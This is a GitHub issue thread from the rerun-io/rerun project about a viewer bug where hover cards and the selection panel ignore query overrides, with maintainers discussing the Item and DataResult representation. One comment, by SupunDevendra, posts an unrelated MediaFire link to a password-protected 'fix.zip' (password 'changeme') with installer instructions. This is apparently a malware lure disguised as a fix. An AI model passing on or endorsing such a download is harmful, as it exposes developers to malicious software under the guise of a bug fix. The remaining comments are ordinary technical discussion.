rerun-io/rerun #7285: The hover card ignores query overrides

teh-cmc, 2024-08-27:
In the following video, the view has a query override (`Range(#42, #42)`), which the hover card seems to completely ignore:

https://github.com/user-attachments/assets/a007f7b6-7cf4-4d37-b67a-afd86de267ef

I can confirm this is bugged on at least 0.17 and 0.18, probably even further back.

teh-cmc, 2024-08-27:
Neither does the selection panel.

SupunDevendra, 2024-08-27:
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

jleibs, 2024-08-27:
I think the core problem here is one of representation.

This somewhat falls out of the `Item`:
https://github.com/rerun-io/rerun/blob/e13b389995b5f1faff2ad8ec4bb8e8362e22e18a/crates/viewer/re_viewer_context/src/item.rs#L10-L34

In theory in a simple case like this of `Range(#42, #42)` this context could be reversed-engineered from knowledge of the SpaceId, but in a longer range, there are in fact multiple instances that could all be hovered and no way to track which is which.

I think this is basically another version of:
- https://github.com/rerun-io/rerun/issues/1003
- https://github.com/rerun-io/rerun/issues/1627

jleibs, 2024-08-27:
In concept I agree, in practice I worry about clutter that's not relevant 90% of the time.

Wumpf, 2024-09-09:
The issue is not limited to paths + index. Even when we hover an entity as whole (most commonly because there's only one index), we only show the "data" section of the selection panel.

The `Item` isn't enum really lacking here either, all of these hovers/selections are `DataResult`, i.e. we *do* have the view id and thus all necessary context to query for overrides & defaults.

This rather was a deliberate decision at the time because of simplicity and the entanglement of view sensitive instance paths. It's also a bit unclear how much we would want to show here (all defaults? all fallbacks?)